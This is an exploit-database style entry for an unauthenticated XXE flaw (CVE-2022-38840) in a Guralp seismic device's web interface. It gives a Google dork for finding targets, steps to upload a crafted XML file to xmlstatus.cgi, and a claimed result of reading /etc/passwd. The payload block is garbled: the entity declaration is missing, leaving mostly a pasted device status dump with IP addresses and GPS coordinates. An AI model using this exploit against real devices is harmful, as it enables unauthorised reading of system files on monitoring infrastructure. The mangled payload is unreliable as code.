# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE # Date: 2022-09-19 # Exploit Author: Ahmed Alroky # Author: http://guralp.com/ # Version: 3.2.4 # Authentication Required: NO # CVE : CVE-2022-38840 # Google dork: " webconfig menu.cgi " # Tested on: Windows # Exploit 1 - browse to http:// name>/cgi-bin/xmlstatus.cgi 2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form 3 - you will get /etc/passwd file content #XML exploit code ``` ]> false platinum 102 running GPS FLL 46196 true 2022-06-14T11:26:53Z 6.1e-08 running never 4.6% -0.3% -0.3% running never running never 11374055 331 1567 0 16 5 7338920142 213600

gdi2gcf[default]

gdi-link-tx[default]

gdi2miniseed[default]

das-in

das-in-textstatus

DONB.HHZ.TM.00

DONB.HHN.TM.00

DONB.HHE.TM.00

DONB.HDF.TM.X0

DONB.HNZ.TM.10

DONB.HNN.TM.10

DONB.HNE.TM.10

DONB.MMZ.TM.00

DONB.MMN.TM.00

DONB.MME.TM.00

DONB.SOH.TM.0

DONB-AIB

DONB.SOH.TM.1

DONB-BIB

DONB.SOH.TM.X

DONB-XIB

11273973132 325518 1085.06 1565 0 7439096490 216516 11374055 331

100 DONB-AZ0 2022-06-14T11:26:46.000000000Z CMG-DAS 0 1

100 DONB-AN0 2022-06-14T11:26:46.000000000Z CMG-DAS 0 1

100 DONB-AE0 2022-06-14T11:26:45.000000000Z CMG-DAS 0 1

100 DONB-XX0 2022-06-14T11:26:35.000000000Z CMG-DAS 0 1

100 DONB-BZ0 2022-06-14T11:26:48.000000000Z CMG-DAS 0 1

100 DONB-BN0 2022-06-14T11:26:42.000000000Z CMG-DAS 0 1

100 DONB-BE0 2022-06-14T11:26:40.000000000Z CMG-DAS 0 1

4 DONB-AM8 2022-06-14T11:24:48.000000000Z CMG-DAS 0

4 DONB-AM9 2022-06-14T11:23:47.000000000Z CMG-DAS 0

4 DONB-AMA 2022-06-14T11:23:57.000000000Z CMG-DAS 0

nan DONB-A00 CMG-DAS 0

nan DONB-AIB CMG-DAS 0

nan DONB-B00 CMG-DAS 0

nan DONB-BIB CMG-DAS 0

nan DONB-X00 CMG-DAS 0

nan DONB-XIB CMG-DAS 0

6184483152 180000 0 0 22682743 655 true 2022-06-14T11:26:53Z 3D 2022-06-14T11:26:53Z 13.909917 100.593734 3 26 12 2022-06-14T11:26:52Z true direct_gps NTP is using a GPS reference source. true 0.000131 GPS 127.127.28.1 GPS 22682743 655 3382931 7

123.160.221.22 21100 false 0

113.53.234.98 33964 false 0

203.114.125.67 48666 false 3221351

113.53.234.98 45158 false 3382931

221.128.101.50 55776 false 3382931

118.175.2.50 60818 false 3382931

203.114.125.67 53984 false 3382931

Inactive Last flush good 2022-06-14T08:10:14Z 27.2% 17449811968 64134021120 VFAT DAS-405D62 10307538 1.72 437809152 77.0% &example; 15809 CMG-DAS 2021-04-08T05:06:17Z 2021-04-08T07:02:50Z 2021-04-08T08:00:33Z 2021-04-08T08:30:41Z 2021-04-08T08:39:15Z 2021-04-08T08:46:24Z 2021-04-08T10:08:51Z 2021-04-09T07:10:41Z 2021-10-07T06:48:35Z 2022-02-15T04:14:30Z 43.875 12.75 0.442 12.675 0.289 12.725 0.002 ```